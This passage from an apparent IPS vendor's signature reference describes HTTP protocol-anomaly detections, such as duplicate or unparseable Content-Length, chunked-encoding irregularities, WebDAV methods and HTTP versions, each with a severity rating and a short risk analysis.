Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: Opera-Browser-Content-Length-Buffer-Overflow
Description: The contents of the reply header Content-Length field are unparseable. The Content-Length field is one of the most common methods to describe the length of the sent data the client should expect. If the contents of that field cannot be parsed, IPS may not be able to parse the reply the same way that the WWW client does. Risk analysis: Risk level is medium. This may be an evasion attempt where attempt is to get IPS to interpret communication differently than WWW client.
Back to top

HTTP_Reply-Content-Length-With-Chunked-Encoding

About this situation: Reply used both Content-Length and chunked encoding
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-241-3038
Description: The HTTP reply uses "chunked" transfer encoding but the request also contains a Content-Length header field. According to the HTTP/1.1 protocol [RFC 2616], an HTTP message that uses "chunked" transfer encoding MUST NOT contain the Content-Length header field. If the Content-Length header field is seen with "chunked" transfer encoding, it must be ignored by an HTTP/1.1 application. Risk analysis: Risk level is medium. If both the Content-Length and the "chunked" transfer encoding are used, correctly behaving HTTP/1.1 applications operate according to the standard. However, older HTTP/1.0 applications or misbehaving applications may use the Content-Length field instead, so it cannot be reliably determined how the WWW server interprets the client request. This may be an evasion attempt where an IDS interprets the communication differently from the WWW server. Some attacks are known to use "chunked" transfer encoding. This may be a disguise attempt for such an attack.
Back to top

HTTP_Reply-Content-Type-Missing

About this situation: HTTP reply Content-Type field missing
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information, SSM HTTP Proxy
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Vulnerability: Opera-Browser-Content-Length-Buffer-Overflow
Description: The server reply is missing the Content-Type field. Risk analysis: Risk level is low. An HTTP reply must always include the Content-Type field if the status code is 200, 201 or 206 and the request method was not OPTIONS or CONNECT.
Back to top

HTTP_Reply-Header-Line-Unparseable

About this situation: Reply header field unparseable
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The HTTP server sent a message header field in an incorrect format. The correct HTTP header field syntax is the name of the header field separated with a colon (:) from the header field value. Incorrect header field syntax is detected when the header field does not contain a colon or the header field name contains an illegal character. Risk analysis: Risk level is medium. A message header field with an incorrect format may be an attempt to feed shell code to the HTTP server. However, incorrect format could be caused by the WWW server or a server-side application that uses non-standard characters in the header field names. Most relevant log fields: "HTTP header" shows the detected header line. Usage note: Starting from NGFW version 6.3.0, this situation will be deprecated and not produced by the NGFW engines any more. Use the situation HTTP_Server-Header-Name-Unparseable instead to detect incorrectly formatted header field names in the server stream, including the use of forbidden characters and missing colon separators.
Back to top

HTTP_Reply-Status-Line-CR

About this situation: HTTP server reply status line contains a stray CR character
Context: HTTP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP server reply status line contains a CR character that is not part of a normal line terminating sequence CRLF. Risk analysis: Risk level is medium. Legitimate HTTP servers should not use a single CR in status lines or headers. As different HTTP implementations may or may not treat a single CR as a line terminator, it could be used as an evasion.
Back to top

HTTP_Reply-Status-Line-Unparseable

About this situation: HTTP reply Status Line unparseable
Context: HTTP without parameters
Severity: 5
Tags: Obsolete, Anomalies, SSM HTTP Proxy
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: The server responded with a status line that was unparseable. WWW servers that are only aware of HTTP/0.9 can trigger this situation, as they never have a status line in their reply. If an HTTP/0.9 server responds to an HTTP/0.9 request, this situation does not occur as the inspection module does not even expect an HTTP reply with a status line. Risk analysis: Risk level is medium. The malformed status line field in an HTTP reply could result from a successful attack against the server, causing the server to output something other than a typical HTTP reply.
Back to top

HTTP_Reply-Upgrade-Unparseable

About this situation: Contents of reply header Upgrade field unparseable
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Description: The HTTP server sent the Upgrade field in an unrecognized format. The HTTP header field Upgrade controls negotiation of HTTP/1.1 protocol switch mechanism (status code 101). Due to invalid formatting or system limitations, contents of the Upgrade header were not parsed correctly. Risk analysis: Risk level is low. This may be an evasion attempt where an IDS interprets the communication differently than HTTP hosts after successful protocol upgrade procedure.
Back to top

HTTP_Reply-Without-Request

About this situation: An HTTP server reply without a prior client request was seen
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP server sent a reply without being requested to do so by a client. HTTP servers are not allowed to send anything that is not a response to a client request. Such an unsolicited reply may be the result of a malfunctioning server, or malicious activity with the intention to evade protocol inspection. This situation may also occur if a connection is not seen from the beginning, the client side packets are not processed by inspection (for example due to cabling or other deployment issue), or the protocol is not HTTP. As such server behavior is in direct violation of the HTTP specification, it is unlikely to occur frequently with any credible and widely used HTTP server implementation, raising the probability of the malicious activity or NGFW deployment/configuration issue scenarios. It is, therefore, recommended to investigate the cause of these situations and to apply corrective measures accordingly.
Back to top

HTTP_Request-BITS-POST

About this situation: HTTP method BITS_POST seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-162-2032
Description: The HTTP request method BITS_POST was seen in an HTTP request. This is a HTTP extension that is used in some environments. Risk analysis: Risk level is none. The HTTP request method BITS_POST alone does not signal any attack.
Back to top

HTTP_Request-CCM-POST

About this situation: HTTP method CCM_POST seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-162-2032
Description: The HTTP request method CCM_POST was seen in an HTTP request. This is a HTTP extension that is used in some environments. Risk analysis: Risk level is none. The HTTP request method CCM_POST alone does not signal any attack.
Back to top

HTTP_Request-Chunked-Encoding-Chunk-Unparseable

About this situation: Chunked-encoded chunk length unparseable
Context: HTTP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-623-5211
Description: The chunk length could not be interpreted in an HTTP client request that uses "chunked" transfer encoding. The length of a "chunked" transfer encoded block could not be read. The start of the possible next HTTP request, chunk header, or chunk trailer cannot be detected reliably. The rest of the stream is handled as HTTP request body data. Risk analysis: Risk level is medium. This may be an evasion attempt where an IDS would interpret the communication differently than the WWW server. Alternatively, this may be an attack attempt against the WWW server's handling of "chunked" transfer encoding.
Back to top

HTTP_Request-Chunked-Encoding-Extra-Data-Before-Chunk-Header

About this situation: Extra data before a chunk header seen in HTTP client request
Context: HTTP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: The HTTP client sent a request containing a body encoded with the "chunked" transfer encoding, inserting extra characters not mandated or allowed by the HTTP specification in front of a chunk header. Chunk headers start with, and most often only consist of, a hexadecimal number indicating the length of the chunk data in bytes. No data is allowed between the end of a chunk and the start of the header of the following chunk. Such extra data could be used as an evasion attempt by taking advantage of the fact that the protocol inspector and the final receiving end may interpret the confusing chunk structure differently, perhaps allowing the receiver to see the disguised payload as content even though the protocol inspector does not.
Back to top

HTTP_Request-Chunked-Encoding-Negative-Chunk-Length

About this situation: Negative chunk length seen in HTTP client request
Context: HTTP without parameters
Severity: 7
Tags: Attack Related Anomalies
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: The HTTP client sent a request containing a body encoded with the "chunked" transfer encoding, including a chunk whose length is nonsensically announced negative in the chunk header. Negative data size is not a meaningful concept. There is a high probability that a negative chunk length is a DoS or evasion attempt, aimed to cause a failure in the receiving end or to evade inspection by forcing the protocol inspector to desynchronize with the stream. As the real size of a negative length chunk could be anything, and the parsing of chunked transfer encoding is entirely dependent on the correctness of the chunk headers with no reliable way to independently figure out the real size of the chunk or the boundaries of any of the following chunks, the parsing of the protocol will stop after this situation has occurred, and any incoming data will continue to be fingerprinted in the HTTP Client Stream context only. Because of this and the highly suspicious nature of the anomaly, this situation should always be set to terminate the connection. If the connection is not terminated, the loss of structured protocol inspection will make the attacker's next steps significantly easier.
Back to top

HTTP_Request-Chunked-Encoding-No-Terminating-Chunk

About this situation: No terminating chunk ending a chunked-encoded message body seen in HTTP client request
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1041-5242
Description: The HTTP client sent a request containing a body encoded with the "chunked" transfer encoding, but did not end the transmission properly with a terminating chunk. When the chunked transfer encoding is used, the message body is sent in pieces called "chunks", with a header in front of every chunk indicating its size. The end of message is signaled using a final terminating chunk with a length of zero. If the terminating chunk is not sent, there is no way for the receiver to know if all of the message has been successfully received.
Back to top

HTTP_Request-CONNECT

About this situation: HTTP method CONNECT seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP request method CONNECT was seen in an HTTP request. An HTTP request begins with the request method describing what the client wants from the server. One of the most common of these is request methods is CONNECT. CONNECT is used when the client is communicating with an HTTP proxy and the client asks the proxy to perform tunneling (eg. SSL tunneling). Risk analysis: Risk level is none. The HTTP request method CONNECT alone does not signal any attack.
Back to top

HTTP_Request-Connection-Field-Unparseable

About this situation: Contents of request header Connection field unparseable
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The HTTP client sent the Connection field in an unrecognized format. The HTTP header Connection field controls whether the request is Keep-Alive or not. Interpreting the Connection header field is necessary to track an HTTP request. If the Connection field uses an unrecognized format, it cannot be known whether the WWW server expects a Keep-Alive connection or not. Risk analysis: Risk level is low. This may be an evasion attempt where an IDS interprets the communication differently than the WWW server.
Back to top

HTTP_Request-Content-Length-Duplicate

About this situation: Request header Content-Length field seen twice
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Duplicate Content-Length field. When the HTTP client is attempting send data to the WWW server, the most common method to describe length of the data sent is to use Content-Length field. If duplicate Content-Length fields are seen, IPS cannot determine which one the WWW server will use, and IPS can behave differently than the WWW server does. Risk analysis: Risk level is medium. This may be an evasion attempt, with the intention of getting IPS to interpret the communication differently than the WWW server.
Back to top

HTTP_Request-Content-Length-Unparseable

About this situation: Contents of Content-Length field unparseable
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Unparseable Content-Length field. When the HTTP client is attempting send data to the WWW server, the most common method to describe length of the data sent is to use Content-Length field. If the contents of that field cannot be parsed, IPS may not be able to parse the reply the same way the WWW server does. Risk analysis: Risk level is medium. This may be an evasion attempt where attempt is to get IPS to interpret communication differently than WWW server.
Back to top

HTTP_Request-Content-Length-With-Chunked-Encoding

About this situation: Request used both Content-Length and chunked encoding
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The HTTP client request uses "chunked" transfer encoding but the request also contains a Content-Length header field. According to the HTTP/1.1 protocol [RFC 2616], an HTTP message that uses "chunked" transfer encoding MUST NOT contain the Content-Length header field. If the Content-Length header field is seen with "chunked" transfer encoding, it must be ignored by an HTTP/1.1 application. Risk analysis: Risk level is medium. If both the Content-Length and the "chunked" transfer encoding are used, correctly behaving HTTP/1.1 applications operate according to the standard. However, older HTTP/1.0 applications or misbehaving applications may use the Content-Length field instead, so it cannot be reliably determined how the WWW server interprets the client request. This may be an evasion attempt where an IDS interprets the communication differently from the WWW server. Some attacks are known to use "chunked" transfer encoding. This may be a disguise attempt for such an attack.
Back to top

HTTP_Request-DELETE

About this situation: HTTP method DELETE seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Vulnerability: Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities
Description: The HTTP request method DELETE was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. DELETE is used to delete a document from the WWW server. Risk analysis: Risk level is low. Some request methods, such as DELETE, BDELETE, and RMDIR can be used to remove documents from WWW server.
Back to top

HTTP_Request-Extra-Data

About this situation: Extra data seen after HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-351-4219
Last changed: sgpkg-ips-351-4219
Description: There was extra data after the HTTP request sent by the client. When the Content-Length header field is not used, and the HTTP protocol version in the client request is pre-1.1, HTTP protocol specifications do not allow any data in the client stream after the request headers. Risk analysis: Risk level is low. Apparent extra data after the request headers can be caused by a syntax error in the request headers, or by using persistent connections when the claimed protocol version does not support them.
Back to top

HTTP_Request-Filter

About this situation: Request filter
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Request denied by request filter.
Back to top

HTTP_Request-GET

About this situation: HTTP method GET seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The HTTP request method GET was seen in an HTTP request. An HTTP request begins with the request method describing what the client wants from the server. One of the most common of these is request methods is GET. GET is used when the client wants to retrieve an HTML page or other resource, such as an image file. Risk analysis: Risk level is none. The HTTP request method GET alone does not signal any attack.
Back to top

HTTP_Request-HEAD

About this situation: HTTP method HEAD seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The HTTP request method HEAD was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. One of the most common methods is HEAD. HEAD is used to determine whether client cached copy of a resource is up-to-date without retrieving the resource at all. Risk analysis: Risk level is none. The HTTP request method HEAD alone does not signal any attack.
Back to top

HTTP_Request-Header

About this situation: Request header
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Request denied with request header.
Back to top

HTTP_Request-Header-Line-Unparseable

About this situation: Request header field unparseable
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP client sent a message header field in an incorrect format. The correct HTTP header field syntax is the name of the header field name separated with a colon (:) from the header field value. Incorrect header field syntax is detected when the header field does not contain a colon or the header field name contains an illegal character. Risk analysis: Risk level is medium. A message header field with an incorrect format may be an attempt to feed shell code to the HTTP server. However, incorrect format could be caused by WWW clients that use non-standard characters in the header field names. Most relevant log fields: "HTTP header" shows the detected header line. Usage note: Starting from NGFW version 6.3.0, this situation will be deprecated and not produced by the NGFW engines any more. Use the situation HTTP_Client-Header-Name-Unparseable instead to detect incorrectly formatted header field names in the client stream, including the use of forbidden characters and missing colon separators.
Back to top

HTTP_Request-Headers-Version-0.9

About this situation: Message headers with HTTP/0.9 detected in request
Context: HTTP without parameters
Severity: 4
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Message headers with HTTP/0.9 were used in a request. An HTTP version 0.9 request does not allow request message lines. If an HTTP/0.9 request with message lines is detected, this situation is triggered. Risk analysis: Risk level is medium. HTTP/0.9 is sometimes used when users retrieve documents manually. Using HTTP/1.0 headers with an HTTP/0.9 request is a well known method of IPS evasion or examining the behavior of a WWW server.
Back to top

HTTP_Request-INDEX

About this situation: HTTP method INDEX seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP request method INDEX was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. The INDEX method is similar to POST, but is a vendor specific extension to HTTP 1.1 [RFC 2616]. Risk analysis: Risk level is none. The HTTP request method INDEX alone does not signal any attack.
Back to top

HTTP_Request-Line-Unparseable

About this situation: Uparseable HTTP request line seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information, SSM HTTP Proxy
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The HTTP request line could not be parsed. The line does not contain correct elements or contains illegal characters. Requests must comform to HTTP 1.1 [RFC 2616]. Risk analysis: Risk level is low. Not being able to parse an HTTP request line should not happen if clients conform to the standards. However, some clients and servers might communicate via an HTTP port using some non-HTTP protocol which triggers this situation. Also, this situation can occur due to some attack, in which case the attack itself will be identified by a fingerprint. Most relevant log fields: "HTTP request line" shows request line up to point Stonesoft IPS was unable to parse. "HTTP request method" shows request method attempted if request method part of request line was parseable. "HTTP request URI" shows the URI in HTTP request if URI part of request line was parseable.
Back to top

HTTP_Request-MKDIR

About this situation: HTTP method MKDIR seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP request method MKDIR was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. MKDIR is used to create directory on server side. MKDIR is a non-standard extension to HTTP 1.1 [RFC 2616]. Risk analysis: Risk level is low. Some request methods, such as DELETE, MKDIR, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-OPTIONS

About this situation: HTTP method OPTIONS seen in HTTP request
Context: HTTP without parameters
Severity: 4
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The HTTP request method OPTIONS was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. OPTIONS is a debug method that queries what methods an URL will accept. Risk analysis: Risk level is low. The OPTIONS method can be used, for example, to determine whether an URL is standard HTTP page or dynamic application. The OPTIONS method can only be used for information gathering.
Back to top

HTTP_Request-Pipelined-No-Reply

About this situation: Server did not reply to all pipelined requests
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: This situation occurs when one or more pipelined HTTP client requests is not answered by the WWW server. However, if all of the requests are ignored by the WWW server, the situation 'HTTP Request without reply' occurs instead. The WWW server is free to choose to handle fewer than all of pipelined requests if too many requests have been pipelined. Risk analysis: Risk level is none
Back to top

HTTP_Request-Pipelined-Too-Many

About this situation: Too many pipelined requests
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: If too many pipelined HTTP requests are made before their replies are seen, the HTTP module is not able to fully inspect more. Currently the system limit is 10 requests. Risk analysis: Risk level is low. Making too many requests simultaneously could be used to create a smoke screen for other attacks. In addition to creating a smoke screen, too many simultaneous active requests may cause the HTTP module to lose track of inspection and cause false positives. The current limit is large enough for all common browsers. However, some browsers allow users to tune the maximum number of pipelined requests and therefore the users with "tuned" browsers may trigger this situation.
Back to top

HTTP_Request-POST

About this situation: HTTP method POST seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The HTTP request method POST was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. One of the most common methods is POST. POST is used to send HTTP forms to a server-side application. Risk analysis: Risk level is none. The HTTP request method POST alone does not signal any attack.
Back to top

HTTP_Request-PUT

About this situation: HTTP method PUT seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Vulnerability: Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities
Description: The HTTP request methods PUT was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. PUT is used to upload a document to the WWW server. Risk analysis: Risk level is low. Some request methods, such as DELETE, PUT, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-RMDIR

About this situation: HTTP method RMDIR seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP request method RMDIR was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. RMDIR is used to delete a directory from WWW server. RMDIR is a non-standard extension to HTTP 1.1 [RFC 2616]. Risk analysis: Risk level is low. Some request methods, such as DELETE and RMDIR can be used to remove documents from the server.
Back to top

HTTP_Request-SEARCH

About this situation: HTTP method SEARCH seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP request method SEARCH was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. SEARCH is used to query a freetext or SQL database. SEARCH is an extension implemented by Microsoft and is not a part of HTTP 1.1 [RFC 2616]. Risk analysis: Risk level is none. The HTTP request method SEARCH alone does not signal any attack.
Back to top

HTTP_Request-SMS-POST

About this situation: HTTP method SMS_POST seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-162-2032
Description: The HTTP request method SMS_POST was seen in an HTTP request. This is a HTTP extension that is used in some environments. Risk analysis: Risk level is none. The HTTP request method SMS_POST alone does not signal any attack.
Back to top

HTTP_Request-TRACE

About this situation: HTTP method TRACE seen in HTTP request
Context: HTTP without parameters
Severity: 4
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP request method TRACE was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. TRACE is a debug method that echoes the client request back to the client. Risk analysis: Risk level is low. The TRACE method is not used by most common WWW browsers or other HTTP clients. The TRACE method is seen when the HTTP request is made with uncommon tools, or with a script running on the client's browser. It is not possible to determine if the the client or server is involved in some form of information gathering attack based on the use of the TRACE method, but it is reasonable to assume so.
Back to top

HTTP_Request-Unknown

About this situation: Unknown HTTP method seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The HTTP request method seen in the HTTP request is unknown. The request methods known to Stonesoft IPS are those of HTTP 1.1 [RFC 2616] and WebDAV [RFC 2518]. Risk analysis: Risk level is low. Unknown request methods may be used to attack against some of the less-commonly used WWW server extensions. Unknown request methods can also be seen when the client uses some protocol other than HTTP or WebDAV that operates on the same port, such as RTSP/1.0 [RFC 2326]. Most relevant log fields: "HTTP request method" shows request method attempted.
Back to top

HTTP_Request-Upgrade-Field-Unparseable

About this situation: Contents of request header Upgrade field unparseable
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Description: The HTTP client sent the Upgrade field in an unrecognized format. The HTTP header field Upgrade controls negotiation of HTTP/1.1 protocol switch mechanism (status code 101). Due to invalid formatting or system limitations, contents of the Upgrade header were not parsed correctly. Risk analysis: Risk level is low. This may be an evasion attempt where an IDS interprets the communication differently than HTTP hosts after successful protocol upgrade procedure.
Back to top

HTTP_Request-URI-Missing

About this situation: HTTP request line does not contain URI
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies, SSM HTTP Proxy
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An HTTP request line did not contain a URI. An HTTP request line always contains a URI or * instead of URI to mark the missing URI. Neither was found. Risk analysis: Risk level is low. This is an illegal HTTP request, but some HTTP servers might accept the request. This should be regarded as a minor anomaly unless there is also some other anomaly present in the request. Most relevant log fields: "HTTP request method" shows request method used.
Back to top

HTTP_Request-Version-0.9

About this situation: HTTP version 0.9 seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: HTTP URI Correlation Dependency Group, Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: HTTP version 0.9 was used in a request. Normally HTTP requests use versions 1.0 or 1.1. HTTP version 0.9 is considered obsolete and is not supported by all deployed servers. Risk analysis: Risk level is low. HTTP/0.9 is sometimes used when users retrieve documents manually. However, HTTP/0.9 has also been used for IPS evasion, as some IPSes have been unable to correctly interpret HTTP/0.9.
Back to top

HTTP_Request-Version-1.0

About this situation: HTTP version 1.0 seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: HTTP version 1.0 was used in a request. HTTP versions 1.0 and 1.1 are the most commonly used HTTP versions and currently almost all HTTP requests use them. Risk analysis: Risk level is none. HTTP version 1.0 alone does not signal any attack.
Back to top

HTTP_Request-Version-1.1

About this situation: HTTP version 1.1 seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: HTTP version 1.1 was used in a request. HTTP versions 1.0 and 1.1 are the most commonly used HTTP versions and currently almost all HTTP requests use them. Risk analysis: Risk level is none. HTTP version 1.1 alone does not signal any attack.
Back to top

HTTP_Request-Version-Missing

About this situation: No version found in HTTP request
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: An HTTP request was made without a version. Normally HTTP requests use versions 1.0 or 1.1, which can be explicitly allowed or denied. An arbitrary version can be allowed by disabling the enforcement, in which case requests will be processes as HTTP/1.1 requests.
Back to top

HTTP_Request-Version-Not-Allowed

About this situation: Version not allowed in HTTP request
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: An HTTP request was made with a version that is not allowed. Normally HTTP requests use versions 1.0 or 1.1, which can be explicitly allowed or denied. An arbitrary version can be allowed by disabling the enforcement, in which case requests will be processes as HTTP/1.1 requests.
Back to top

HTTP_Request-Version-Not-HTTP

About this situation: HTTP version identifier is not HTTP
Context: HTTP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-489-5211
Description: The version identifier in the HTTP protocol does not start with the keyword HTTP. Some protocols, such as RTSP can appear in same port than HTTP, but they use different version identifier. Currently, Stonesoft IPS is not able to inspect such protocols. Risk analysis: Risk level is low.
Back to top

HTTP_Request-Version-Unknown

About this situation: Unknown HTTP version seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown HTTP version was used in a request. Normally HTTP requests use versions 1.0 or 1.1. In addition to these, HTTP version 0.9 is recognized by Stonesoft IPS. Stonesoft IPS processes unknown HTTP requests in the same way as it processes HTTP/1.1 requests. Risk analysis: Risk level is low. Unknown HTTP version numbers have been used for IPS evasion as they are typically served by WWW servers.
Back to top

HTTP_Request-WebDAV-BCOPY

About this situation: WebDAV method BCOPY seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method BCOPY was seen in an HTTP request. An HTTP [RFC 2616] request begins with a request method describing what the client wants from the server. BCOPY is used to copy one or more target resources on the WWW server. BCOPY is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, BCOPY, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-WebDAV-BDELETE

About this situation: WebDAV method BDELETE seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method BDELETE was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. BDELETE is used to delete one or more target resources on the WWW server. BDELETE is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, BDELETE, and RMDIR can be used to remove documents from WWW server.
Back to top

HTTP_Request-WebDAV-BMOVE

About this situation: WebDAV method BMOVE seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method BMOVE was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. BMOVE is used to move one or more target resources on the WWW server. BMOVE is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, BMOVE, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-WebDAV-BPROPFIND

About this situation: WebDAV method BPROPFIND seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
